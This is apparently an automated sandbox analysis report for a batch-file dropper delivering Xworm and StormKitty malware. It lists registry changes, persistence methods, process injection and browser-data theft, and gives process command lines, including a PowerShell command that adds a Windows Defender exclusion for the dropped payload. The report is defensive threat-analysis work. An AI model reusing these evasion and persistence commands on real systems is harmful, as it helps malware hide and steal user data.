Analysis Overview
SHA256
caef8631cfa691871889f8f211d50823d55f06227b0c3d3ab619ef83d70c147a
Threat Level: Known bad
The file NightyBatchDropper.bat was found to be: Known bad.
Malicious Activity Summary
Xworm
StormKitty payload
Suspicious use of NtCreateUserProcessOtherParentProcess
Modifies Windows Defender Real-time Protection settings
Contains code to disable Windows Defender
Detect Xworm Payload
StormKitty
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Executes dropped EXE
Drops startup file
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Drops desktop.ini file(s)
Looks up external IP address via web service
Sets desktop wallpaper using registry
Suspicious use of SetThreadContext
Launches sc.exe
Enumerates physical storage devices
Creates scheduled task(s)
Modifies data under HKEY_USERS
Modifies Internet Explorer settings
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Uses Task Scheduler COM API
Runs net.exe
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SendNotifyMessage
Enumerates system info in registry
Checks processor information in registry
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-05-07 16:46
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-07 16:46
Reported
2024-05-07 17:16
Platform
win11-20240419-en
Max time kernel
1792s
Max time network
1798s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
StormKitty
StormKitty payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 2308 created 700 | N/A | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | C:\Windows\system32\lsass.exe |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowSC.lnk | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowSC.lnk | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowSC = "C:\\Users\\Admin\\AppData\\Roaming\\WindowSC.exe" | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Users\Admin\OneDrive\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File opened for modification | C:\Users\Admin\Searches\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-2878097196-921257239-309638238-1000\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File opened for modification | C:\Users\Admin\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File opened for modification | C:\Users\Admin\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File opened for modification | C:\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File opened for modification | C:\Users\Admin\Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Saved Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File opened for modification | C:\Users\Admin\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File opened for modification | C:\Users\Admin\Contacts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Camera Roll\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| File opened for modification | C:\Users\Admin\Saved Games\desktop.ini | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | ip-api.com | N/A | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XBackground.bmp" | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 2308 set thread context of 2976 | N/A | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" | C:\Windows\explorer.exe | N/A |
| Key created | \Registry\User\S-1-5-21-2878097196-921257239-309638238-1000_Classes\NotificationData | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
Runs net.exe
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\NightyBatchDropper.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoExit -encodedCommand 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
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\r3ebudtm\r3ebudtm.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A07.tmp" "c:\Users\Admin\AppData\Local\Temp\r3ebudtm\CSCA34A7BD2B97740449C58EA6BA518F6C.TMP"
C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe
"C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\IRC_Connect.exe'
